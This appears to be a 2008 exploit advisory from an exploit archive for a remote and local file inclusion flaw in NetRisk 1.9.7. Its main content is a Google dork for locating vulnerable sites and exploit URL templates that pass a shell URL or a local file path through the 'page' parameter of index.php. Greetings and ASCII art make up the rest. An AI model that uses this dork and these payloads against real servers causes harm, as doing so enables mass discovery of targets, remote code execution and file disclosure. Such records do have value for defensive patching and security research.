id: 2439
date: 01/04/2008
title: NetRisk <= 1.9.7 Remote/Local File Inclusion Vulnerability
author: S.W.A.T.
cves: 

==========================================================
NetRisk <= 1.9.7 Remote/Local File Inclusion Vulnerability
==========================================================



#########################################################################
        NetRisk <= 1.9.7 Remote/Local File Inclusion Vulnerability      #
#########################################################################
AUTHOR     : S.W.A.T.							#
Download   : http://phprisk.org/netrisk_1.9.7.zip                       #
#########################################################################
DorKs      : inurl:index.php?page=gamebrowser                           #
#########################################################################
## EXPLOIT :                                                            #
http://server.com/Path/index.php?page=[SHELL]                           #
http://server.com/Path/index.php?page=[-LFI-]                           #
#########################################################################
## GREETZ  : Str0ke - Dj7xpl - DarKLiFe - NazNazi - XmorsTEAM           #
#########################################################################
## Note    : BaBayE NET For Ever :-h =; :(( :((                         #
#########################################################################
========================================================================#
||  ##    ##   ##           ##########   #######     ########         ||#
||   ##  ##    ##########   ##########   ##   ##     ##               ||#
||    ####     ##########   ##      ##   #######     ########         ||#
||    ####     ##  ##  ##   ##      ##   #######           ##         ||#
||   ##  ##    ##  ##  ##   ##########   ##    ##          ##         ||#
||  ##    ##   ##  ##  ##   ##########   ##     ##   ########         ||#
========================================================================#
#########################################################################
#								        #
#   BYE ALL MY FRIENDS OVER THE NET & EVERYTHING ON THE NET             #
#								        #
#########################################################################



#  0day.today [2023-03-24]  #